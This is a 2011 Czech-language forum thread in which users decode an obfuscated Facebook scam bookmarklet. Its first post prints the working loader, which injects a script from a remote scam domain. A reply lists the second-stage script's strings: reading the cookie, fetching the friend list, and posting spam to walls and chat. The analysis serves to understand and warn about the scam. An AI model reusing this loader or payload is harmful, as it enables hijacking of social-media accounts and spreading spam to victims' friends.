Autor | Zpráva | ||
---|---|---|---|
Darker Profil |
#1 · Zasláno: 16. 4. 2011, 20:22:44
Náhodou (i když zas taková náhoda to ze statistického hlediska nebyla) jsem narazil na velice podivnou podvodnickou stránku o facebooku, která vám slibuje nějaké nesmysly, když spustíte na facebooku jejich javascript.
Docela by mě zajímalo, co ten skript doopravdu udělá, sám jsem na to nepřišel. javascript:var _0xc52e=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x2F\x2F\x31\x31\x31\x39\x39\x39\x39\x39\x37\x37\x75\x37\x2E\x69\x6E\x66\x6F\x2F\x65\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"]; (a=(b=document)[_0xc52e[2]](_0xc52e[1]))[_0xc52e[0]]=_0xc52e[3];b[_0xc52e[5]][_0xc52e[4]](a); void (0); Určitě nic pěkného, jestli to vůbec funguje. |
||
johnl Profil |
#2 · Zasláno: 16. 4. 2011, 20:25:49 · Upravil/a: johnl
Darker:
Nevím jestli je to to samé, ale kdysi jsem narazil na kód (který vypadal hodně podobně) a ten po spuštění vložil na zeď několika přátel spam (odkaz na ten web či tak něco).. :)) |
||
ShiraNai7 Profil |
#3 · Zasláno: 16. 4. 2011, 20:28:13
Nastaví proměnnou _0xc52e na toto:
["src", "script", "createElement", "//1119999977u7.info/e.js", "appendChild", "body"] Co se stane pak je jasné :) Vloží se další skript do stránky z jejich domény. A ten dělá něco s přáteli, píše jim na zeď nebo něco takového :) ["Hey %firstname% I just... http://stump.ws/rdgct7", "%tf% %tf% %tf% %tf% %tf... http://stump.ws/rdgct7", "http://www.1119999977u7.info/end.php", "yo , I learned a way to... http://stump.ws/rdgct7", "See Who Has Viewed Your Profile!", "You should really check this out. It really works!", "This is the new code th...has been talking about!", "href", "location", "top", "GET", "open", "onreadystatechange", "readyState", "status", "responseText", "send", "/", "match", "cookie", "@[", "id", ":", "name", "]", "", "&", "=", "POST", "Content-Type", "application/x-www-form-urlencoded", "setRequestHeader", "div", "createElement", "display", "style", "block", "position", "absolute", "width", "%", "height", "left", "px", "textAlign", "center", "padding", "4px", "background", "#FFFFFF", "zIndex", "innerHTML", " <br/>Please wait,...s may be less accurate)", "appendChild", "body", "data", "firstChild", "navAccountName", "getElementById", "?", "/ajax/choose/?__a=1", "event", "AsyncRequest", "/ajax/typeahead/first_degree.php?__a=1&viewer=", "&token=", "&filter[0]=user&options...m&options[2]=sort_alpha", "length", "push", "getTime", "setTime", "getMonth", "getDate", "getFullYear", "getHours", ",", "join", "on", "Create Event", "new", "/events/create.php", "/ajax/chat/buddy_list.php?__a=1", "substr", "(", ")", "buddy_list", "payload", "nowAvailableList", "random", "floor", "%firstname%", "toLowerCase", "firstName", "userInfos", "replace", "/ajax/chat/send.php?__a=1", "/ajax/browser/friends/?uid=", "&filter=all&__a=1&__d=1", "shift", "fetched friends: ", "home", "pop", "%tf%", "search", "xhpc_message_text", "xhpc_message", "message text: ", "/ajax/updatestatus.php?__a=1", "profile"] |
||
Darker Profil |
#4 · Zasláno: 16. 4. 2011, 20:37:32
ShiraNai7:
„Co se stane pak je jasné :)“ Jistě, ale jak se to stane? Netuším, jak se script z proměnné _0xc52e spustí. Nikde žádné eval, ani function. |
||
ShiraNai7 Profil |
#5 · Zasláno: 16. 4. 2011, 21:20:47 · Upravil/a: ShiraNai7
Darker:
Je to nesrozumitelné, protože javascript umožnuje více operací s návratovou hodnotou, než třeba PHP. Jsou tam použity proměnné názvy funkcí a proměnných. Skript dělá následující 1) dosadí do proměnné "b" objekt "document" 2) dosadí do proměnné "a" výsledek volání funkce createElement s parametrem "script" (volá se na objektu "document") 3) změní vlastnost "src" objektu "a" (což je element "script") na adresu skriptu na vzdálené doméně 4) zavolá funkci "appendChild" s argumentem "a" na document.body, čímž vloží skript do stránky Když si dosadíš za proměnné dané hodnoty a rozřádkuješ, uvidíš to lépe: (a=(b=document)["createElement"]("script"))["src"]="//1119999977u7.info/e.js"; b["body"]["appendChild"](a); A když to rozepíšu normálně, tak takto: b = document; a = document.createElement("script"); a.src = "//1119999977u7.info/e.js"; b.body.appendChild(a); |
||
Lupa Profil |
#6 · Zasláno: 16. 4. 2011, 21:48:23
No, mám Google Chrome a mne vypísalo len:
Varovanie! Podozrenie na phishingovú stránku! Ja by som tam vôbec nechodil... |
||
Darker Profil |
#7 · Zasláno: 17. 4. 2011, 10:24:48
Lupa:
„Ja by som tam vôbec nechodil...“ Chytrý to chlapec. |
||
Časová prodleva: 19 dní
|
|||
Moucha Profil * |
#8 · Zasláno: 6. 5. 2011, 20:47:03
Když už jsem na to kliknul, jak se toho mám zbavit? Vůbec mi nejde se přihlásit na můj facebook account :(
|
||
Časová prodleva: 14 let
|
0